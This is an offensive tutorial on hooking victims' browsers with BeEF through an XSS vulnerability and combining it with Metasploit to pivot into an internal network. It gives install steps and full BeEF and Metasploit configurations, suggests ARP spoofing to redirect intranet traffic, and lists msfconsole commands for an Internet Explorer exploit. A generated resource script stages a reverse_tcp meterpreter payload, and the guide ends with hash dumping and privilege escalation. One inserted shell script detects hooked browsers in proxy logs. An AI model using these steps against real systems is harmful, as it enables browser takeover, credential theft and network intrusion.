Intranet Penetration, Part 1: Using an XSS Vulnerability to Get Into the Internal Network
0x01: Background
BeEF (The Browser Exploitation Framework Project) is currently the most widely used browser-attack framework in Europe and the US. It needs nothing more than a simple XSS vulnerability: a prepared JavaScript file (hook.js) is loaded into the target's browser and, for as long as the hooked page stays open, gives the attacker control of that browser. Through it the attacker can collect detailed information about the host, scan the internal network from the victim's own position and, combined with Metasploit, use the browser as a pivot into the intranet.
0x02: Installation
If BeEF is not already present on your Kali Linux system, install the beef-xss package:
apt-get update
apt-get install beef-xss
0x03: Getting Started
0x03.1: Starting BeEF
BeEF's home directory is /usr/share/beef-xss:
cd /usr/share/beef-xss
./beef
The admin panel is then at http://127.0.0.1:3000/ui/panel (the panel_path setting in config.yaml). Default credentials:
beef/beef
These come from the credentials section of config.yaml. Change them before putting the server anywhere reachable: the config shown below also sets permitted_ui_subnet to 0.0.0.0/0, so the panel accepts logins from any address that can reach port 3000.
Demo page: http://<beef-ip>:3000/demos/butcher/index.html
To check that the attacker and target hosts can reach each other, open the BeEF demo page from the target. The demo page already embeds hook.js, so simply loading it hooks the browser.
0x04: Planting the Hook
The hook is planted by adding a <script> tag to an otherwise normal page, with its src pointing at hook.js on the BeEF server.
In a real engagement (which needs an IP address the victims can reach, normally a public one), how do you get the victim to open a page that carries hook.js?
The case shown here used an XSS platform rather than BeEF. With BeEF you get not only the back-end administrator's cookie but, combined with Metasploit, the administrator's browser itself as a jump host into the company intranet:
Online Browsers -> right-click -> Use As Proxy
Combine this with ARP spoofing (a man-in-the-middle position on the LAN) and every HTTP request on the internal network can be redirected to the hooked page...
When a host is hooked it shows up in the BeEF panel (much like the old 灰鴿子 (Gray Pigeon) and 上興 RAT consoles).
Through the browser we can see a great deal about the target host:
- Browser: name and version, UA string, platform, window size
- Plugins: Flash, VBScript, WebSockets, QuickTime, ...
- API support
- Cookies
- Operating system
- Date and time
- Hardware: CPU (32/64-bit), screen resolution, touch-screen support
- and so on
Tested here with Firefox.
BeEF modules
Commonly used modules
The redirect module, for example: once it runs, whatever site the target browser tries to visit, it is redirected to bobao.360.cn. In a real internal engagement you combine this with ARP spoofing so that all HTTP traffic on the intranet is redirected to a page embedding the hook script...
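Whichever delivery path is used, a script tag in a stored page or a MITM redirect, the hooked browser leaves the same marks: a fetch of the hook script from the BeEF server, followed by continuous polling that carries the BEEFHOOK session value. The following is an added example written for this page (not BeEF's code and not the author's) that shows how a defender would pick those marks out of a proxy log and a saved page; it keys only on values visible in the config.yaml shown later (hook_file "/hook.js", hook_session_name "BEEFHOOK", port 3000). The log lines, HTML, hostnames, IPs and the poll path are constructed for the demo.

```shell
#!/bin/sh
# Added example, written for this page (not BeEF code, not the author's):
# what a hooked browser looks like from the defender's side, keyed on the
# artefacts visible in the page's own config.yaml: hook_file "/hook.js",
# hook_session_name "BEEFHOOK" and the default port 3000. The log lines,
# HTML, hostnames, IPs and the "/dh" poll path below are constructed.

# Proxy log in Apache "combined" format -> one "client beef_server" line per
# browser that fetched the hook script or sent a poll carrying BEEFHOOK.
# The hook polls continuously, so one client yields many lines; sort -u
# folds them into one.
find_hooked_clients() {
    awk '
        {
            url = $7                                  # request target
            if (url ~ /\/hook\.js(\?|$)/ || url ~ /BEEFHOOK=/) {
                srv = url                             # keep only host[:port]
                sub(/^https?:\/\//, "", srv)
                sub(/\/.*$/, "", srv)
                if (srv == "") srv = "(this server)"  # relative URL, server log
                print $1, srv
            }
        }
    ' "$@" | sort -u
}

# Saved page source -> script src values that look like an injected hook:
# an absolute URL ending in hook.js, or any script pulled from port 3000 on
# a host other than the page's own. First argument is the page's own host.
# An attacker can rename hook.js and move the port (both are config.yaml
# settings), so the "foreign origin" rule is the one that keeps working.
find_hook_tags() {
    own="$1"; shift
    q="'"
    grep -oi "<script[^>]*src=[\"$q][^\"$q]*" "$@" \
      | sed "s/.*src=[\"$q]//" \
      | awk -v own="$own" '
          /\/hook\.js$/ { print; next }
          /^https?:\/\/[^\/]*:3000\// && index($0, "://" own) == 0 { print }
        '
}

# Demo on constructed data (no real traffic involved).
demo() {
    log="$(mktemp)"; page="$(mktemp)"
    cat > "$log" <<'EOF'
10.0.0.15 - - [12/May/2014:10:01:02 +0800] "GET http://intranet.example/index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 Firefox/29.0"
10.0.0.15 - - [12/May/2014:10:01:03 +0800] "GET http://203.0.113.10:3000/hook.js HTTP/1.1" 200 46813 "http://intranet.example/index.html" "Mozilla/5.0 Firefox/29.0"
10.0.0.15 - - [12/May/2014:10:01:04 +0800] "GET http://203.0.113.10:3000/dh?BEEFHOOK=a1b2c3 HTTP/1.1" 200 2 "http://intranet.example/index.html" "Mozilla/5.0 Firefox/29.0"
10.0.0.22 - - [12/May/2014:10:02:11 +0800] "GET http://cdn.example/lib.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0 Chrome/34.0"
EOF
    cat > "$page" <<'EOF'
<html><head>
<script src="/js/app.js"></script>
<script src='https://cdn.example/lib.js'></script>
</head><body>
<div class="comment">nice post <script src="http://203.0.113.10:3000/hook.js"></script></div>
</body></html>
EOF
    echo "hooked clients:"; find_hooked_clients "$log"
    echo "injected tags:";  find_hook_tags intranet.example "$page"
    rm -f "$log" "$page"
}
demo
```

Run it against a real proxy log with `find_hooked_clients /var/log/squid/access.log` (the field positions assume combined format) and against exported page content with `find_hook_tags your.host file.html`. The strongest indicator is not the file name, which the operator can change, but a browser on the internal network that keeps talking to one unfamiliar host every few seconds for as long as a page is open.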
Chrome Extensions
Debug: test HTTP requests
Exploits: attack through browser vulnerabilities
Host: collect information about the victim host
Metasploit: integration with Metasploit, the focus of this article
Network: DoSer, ping, DNS enumeration, port scanning and so on
Social Engineering: social-engineering modules
0x05: Working with Metasploit
BeEF configuration file: /usr/share/beef-xss/config.yaml. Change
metasploit:
    enable: false
to
metasploit:
    enable: true
The complete config.yaml (BeEF 0.4.4.5-alpha) with the Metasploit extension enabled:
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.4.4.5-alpha'
    debug: false

    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"

    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        restful_api:
            allow_cors: false
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
            port: 61985 # WS: good success rate through proxies
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #  gem "dm-postgres-adapter"
        # or
        #  gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"

        # db_file is only used for sqlite
        db_file: "db/beef.db"

        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"

    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"

    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true

    crypto_default_value_length: 80

    # Enable client-side debugging
    client:
        debug: false

    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
            shell:
                enable: false
        ipec:
            enable: true
The Metasploit extension has its own configuration file, /usr/share/beef-xss/extensions/metasploit/config.yaml:
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
Set the two parameters host and callback_host to the IP of the BeEF host (Metasploit runs on the same machine here). They must also match the ServerHost you pass to load msgrpc, and they must be an address the hooked browsers can reach, since callback_host is where victims are sent for exploits.
Restart PostgreSQL and Metasploit:
service postgresql restart && service metasploit restart
Then restart BeEF.
On start-up BeEF reports that it has loaded 246 Metasploit exploits; an up-to-date MSF should have five or six hundred.
In the BeEF panel the count shows as 245 for some reason.
In msfconsole:
use exploit/windows/browser/ie_execcommand_uaf
show options
set SRVHOST 172.16.244.129
exploit
The hooked target browser is then forcibly redirected to the URL MSF is listening on.
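The BeEF side of the wiring above (enable the extension, set host and callback_host, keep them in step with what msfconsole is told) is easy to get subtly wrong, and the symptom is always the same: BeEF connects to MSF, the browser is redirected, and no session ever appears. The following is an added example written for this page, not BeEF's or Metasploit's own tooling. It scripts the edits, checks the values against each other, and emits the matching msfconsole resource script. Assumptions not taken from the page: BeEF lives under $BEEF_HOME (default /usr/share/beef-xss), the YAML files keep the 4-space layout shown above, and the meterpreter reverse_tcp payload is the one you want.

```shell
#!/bin/sh
# Added example for this page (not BeEF's or Metasploit's own tooling):
# script the BeEF<->Metasploit wiring described above and verify the two
# sides agree before restarting anything. Assumptions not from the page:
# BeEF lives under $BEEF_HOME (default /usr/share/beef-xss) and the YAML
# files keep the 4-space layout shown above.

BEEF_HOME="${BEEF_HOME:-/usr/share/beef-xss}"
MAIN_CFG="$BEEF_HOME/config.yaml"
MSF_CFG="$BEEF_HOME/extensions/metasploit/config.yaml"

# Turn on the Metasploit extension: rewrite the first `enable:` line after a
# `metasploit:` key. Other extensions (proxy, evasion, ...) are untouched.
enable_metasploit_extension() {
    file="$1"; tmp="$file.tmp.$$"
    awk '
        /^[[:space:]]*metasploit:[[:space:]]*$/ { in_msf = 1 }
        in_msf && /^[[:space:]]*enable:/ { sub(/false/, "true"); in_msf = 0 }
        { print }
    ' "$file" > "$tmp" && mv "$tmp" "$file"
}

# Point host and callback_host at the box where msgrpc listens. They must
# match each other and the ServerHost given to `load msgrpc`; if they do not,
# BeEF still connects but hooked browsers are sent to the wrong exploit server.
set_msf_host() {
    file="$1"; ip="$2"; tmp="$file.tmp.$$"
    sed -e "s/^\([[:space:]]*host:[[:space:]]*\)\"[^\"]*\"/\1\"$ip\"/" \
        -e "s/^\([[:space:]]*callback_host:[[:space:]]*\)\"[^\"]*\"/\1\"$ip\"/" \
        "$file" > "$tmp" && mv "$tmp" "$file"
}

# Read one scalar (quotes stripped) from the extension config.
yaml_value() {
    key="$1"; file="$2"
    sed -n "s/^[[:space:]]*$key:[[:space:]]*['\"]\{0,1\}\([^'\"#]*\)['\"]\{0,1\}.*/\1/p" "$file" | head -n 1
}

# host and callback_host must be identical and routable from the victims:
# a loopback or wildcard address here is the classic "MSF connected but no
# session" mistake.
check_msf_config() {
    h="$(yaml_value host "$1")"; cb="$(yaml_value callback_host "$1")"
    [ -n "$h" ] && [ "$h" = "$cb" ] && [ "$h" != "127.0.0.1" ] && [ "$h" != "0.0.0.0" ]
}

# The `load msgrpc` line msfconsole needs, generated from the same file BeEF
# reads so the credentials and listener address cannot drift apart.
msgrpc_load_command() {
    printf 'load msgrpc ServerHost=%s ServerPort=%s User=%s Pass=%s ServerType=Web\n' \
        "$(yaml_value host "$1")" "$(yaml_value port "$1")" \
        "$(yaml_value user "$1")" "$(yaml_value pass "$1")"
}

# Resource script: load msgrpc, then stage the browser exploit used on this
# page as a background job. Run it with: msfconsole -r beef_msf.rc
write_msf_rc() {
    cb="$(yaml_value callback_host "$1")"
    {
        msgrpc_load_command "$1"
        printf 'use exploit/windows/browser/ie_execcommand_uaf\n'
        printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
        printf 'set SRVHOST %s\nset LHOST %s\n' "$cb" "$cb"
        printf 'exploit -j\n'
    } > "$2"
}

# Demo on constructed copies of the two files, so this runs without BeEF.
demo() {
    d="$(mktemp -d)"
    printf '%s\n' 'beef:' '    extension:' '        proxy:' '            enable: true' \
        '        metasploit:' '            enable: false' '        evasion:' \
        '            enable: false' > "$d/config.yaml"
    printf '%s\n' 'beef:' '    extension:' '        metasploit:' "            name: 'Metasploit'" \
        '            enable: true' '            host: "127.0.0.1"' '            port: 55552' \
        '            user: "msf"' '            pass: "abc123"' '            callback_host: "127.0.0.1"' \
        > "$d/msf.yaml"
    enable_metasploit_extension "$d/config.yaml"
    check_msf_config "$d/msf.yaml" || echo "before: host/callback_host not usable"
    set_msf_host "$d/msf.yaml" 172.16.244.129
    check_msf_config "$d/msf.yaml" && echo "after: host/callback_host consistent"
    write_msf_rc "$d/msf.yaml" "$d/beef_msf.rc"
    cat "$d/beef_msf.rc"
    rm -rf "$d"
}
demo
# Real use: enable_metasploit_extension "$MAIN_CFG"; set_msf_host "$MSF_CFG" <beef-ip>;
# write_msf_rc "$MSF_CFG" beef_msf.rc; then restart postgresql, metasploit and BeEF.
```

Start msfconsole with the generated resource script before starting BeEF, so the msgrpc listener is up when BeEF tries to connect; BeEF's start-up output then reports how many Metasploit exploits it loaded (246 in the run shown above). The URL that `exploit -j` prints is what the hooked browser has to be sent to, for example with the redirect module described earlier.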
MSF sees the connection, but the XP virtual machine apparently already has the patch for this vulnerability (MS12-063, CVE-2012-4969), so no session is created.
If XP is unpatched, i.e. the vulnerability this exploit targets is present, a session is created here:
sessions -i 1
screenshot: capture the phished host's screen to a local file
sysinfo: show system information
hashdump: dump the target host's user password hashes
Note that hashdump needs SYSTEM privileges, while a browser exploit only gives you the rights of the logged-in user; run getsystem (or another privilege-escalation step) first.